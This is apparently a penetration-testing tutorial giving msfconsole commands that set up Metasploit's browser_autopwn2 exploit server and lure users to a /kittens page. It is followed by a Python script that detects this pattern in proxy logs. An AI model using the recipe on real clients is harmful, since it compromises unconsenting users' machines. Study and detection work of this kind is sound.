Using Metasploit's browser_autopwn2 to attack a client

Metasploit Framework includes a huge collection of client-side exploits, many of which target known vulnerabilities in web browsers. One module can detect the browser version a client is running and pick the most suitable exploit to trigger: browser_autopwn, or browser_autopwn2 in its newest version.

In this recipe, we will set up an attack with browser_autopwn2 and get it ready for a victim to come in.

How to do it...

  1. Start msfconsole.
  2. We will use version 2 of Browser Autopwn (BAP2):
    use auxiliary/server/browser_autopwn2
    
  3. Let's take a look at what configurable options it has:
    show options
    
  4. We will set our Kali server to receive connections:
    set SRVHOST 192.168.56.1
    
  5. Then, we will create a path /kittens for the server to respond to:
    set URIPATH /kittens
    
  6. This module triggers a multitude of exploits, including some for Android; suppose we are setting up an attack with PCs as targets and don't want to depend on the authorization of Adobe Flash, we will exclude the Android and Flash exploits:
    set EXCLUDE_PATTERN android|adobe_flash
    
  7. We will also set two advanced options (use show advanced to view the full list of advanced options) so that the module shows us the individual path of each exploit it launches and is more verbose:
    set ShowExploitList true
    set VERBOSE true
    

    Advanced options also allow us to choose the payload and its parameters, such as LHOST and LPORT, for each platform (Windows, Unix, and Android).

  8. Now, we are ready to run the exploit:
    run
    

    If we want to trigger a particular exploit, we can append its Path value (shown in the exploit list) to our server's URL; for example, to trigger firefox_svg_plugin we send http://192.168.56.1/PWrmfJApkwWsf to the victim. Paths are generated randomly each time the module runs.

  9. In a client's browser, if we go to http://192.168.56.1/kittens, we will see BAP2 respond immediately and try all fitting exploits; when one of them succeeds, it creates a session in the background.

How it works...

Browser Autopwn sets up a web server whose main page uses JavaScript to identify what software the client is running and, based on that, chooses which exploits to try against it.

In this recipe, we set our Kali machine to listen on port 8080 for requests to the kittens directory. Other options we configured were:

  • EXCLUDE_PATTERN: To tell BAP2 to exclude (not load) exploits for Android browsers or for Flash plugins
  • ShowExploitList: To show the loaded exploits when BAP2 is run
  • VERBOSE: To tell BAP2 to display more information about what was loaded, where and what's happening at every step

After that, we just need to run the module and get some users to visit our /kittens site.
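From the defender's side, the behaviour described above leaves a recognisable trace in web proxy logs: a client fetches a landing page and then, within seconds, requests several random-looking top-level paths (one per exploit that BAP2 decides to try) on the same host. The following Python script is an added example, not part of the original recipe or of Metasploit, that scans constructed proxy log lines for that pattern. The log format, the 10.0.0.x client addresses and the random paths other than /PWrmfJApkwWsf are made up; the entropy threshold, the minimum path length and the "three random paths within 60 seconds" rule are assumed heuristics, not documented BAP2 behaviour.

```python
"""Flag clients that request several random-looking paths on one host in quick succession."""
import math
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample proxy log (not from the page). Fields: timestamp client method url status.
# 192.168.56.1, /kittens and /PWrmfJApkwWsf come from the recipe; the rest is invented.
SAMPLE_LOG = """\
2024-05-01T10:00:00 10.0.0.5 GET http://192.168.56.1:8080/kittens 200
2024-05-01T10:00:01 10.0.0.5 GET http://192.168.56.1:8080/PWrmfJApkwWsf 200
2024-05-01T10:00:01 10.0.0.5 GET http://192.168.56.1:8080/qZkTvHgLmNpRw 200
2024-05-01T10:00:02 10.0.0.5 GET http://192.168.56.1:8080/bXcVnMaSdFgHj 200
2024-05-01T10:00:03 10.0.0.5 GET http://192.168.56.1:8080/tYuIoPlKjHgF 404
2024-05-01T10:00:05 10.0.0.7 GET http://intranet.example.com/index.html 200
2024-05-01T10:00:05 10.0.0.7 GET http://intranet.example.com/css/stylesheet.css 200
2024-05-01T10:00:06 10.0.0.7 GET http://intranet.example.com/dictionary 200
2024-05-01T10:30:00 10.0.0.9 GET http://cdn.example.net/aB3dE5fG7hJ9kL 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")
URL_RE = re.compile(r"^https?://([^/]+)(/.*)?$")


def shannon_entropy(text):
    """Bits of entropy per character of the given string."""
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_random(segment):
    """Assumed heuristic: a single alphanumeric path segment of 10+ characters that
    mixes upper and lower case (or contains digits) and has high entropy."""
    if len(segment) < 10 or not segment.isalnum():
        return False
    mixed_case = any(c.isupper() for c in segment) and any(c.islower() for c in segment)
    has_digit = any(c.isdigit() for c in segment)
    return (mixed_case or has_digit) and shannon_entropy(segment) >= 3.0


def parse_line(line):
    """Parse one constructed log line into a record, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, _method, url, status = m.groups()
    u = URL_RE.match(url)
    if not u:
        return None
    return {
        "ts": datetime.fromisoformat(ts),
        "client": client,
        "host": u.group(1),
        "path": u.group(2) or "/",
        "status": int(status),
    }


def find_autopwn_patterns(log_text, min_random_paths=3, window_seconds=60):
    """Return one alert per (client, host) pair that requested at least
    min_random_paths random-looking top-level paths within window_seconds."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        segments = [s for s in rec["path"].split("/") if s]
        # Only top-level paths like /PWrmfJApkwWsf are of interest here.
        if len(segments) == 1 and looks_random(segments[0]):
            hits[(rec["client"], rec["host"])].append((rec["ts"], segments[0]))

    alerts = []
    for (client, host), events in hits.items():
        events.sort()
        # Sliding window over the time-ordered events for this client/host pair.
        for i in range(len(events)):
            j = i
            while j < len(events) and (events[j][0] - events[i][0]).total_seconds() <= window_seconds:
                j += 1
            if j - i >= min_random_paths:
                alerts.append({
                    "client": client,
                    "host": host,
                    "first_seen": events[i][0].isoformat(),
                    "paths": [p for _, p in events[i:j]],
                })
                break
    return alerts


if __name__ == "__main__":
    for alert in find_autopwn_patterns(SAMPLE_LOG):
        print(f"{alert['client']} -> {alert['host']} at {alert['first_seen']}: {alert['paths']}")
```

In the constructed log, the first client is flagged (four random paths on one host within three seconds) while the intranet browsing and the single hashed CDN asset are not. The single-path case is why the rule counts several paths in a window rather than alerting on every high-entropy URL: content-addressed asset names are common and would otherwise drown the signal.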
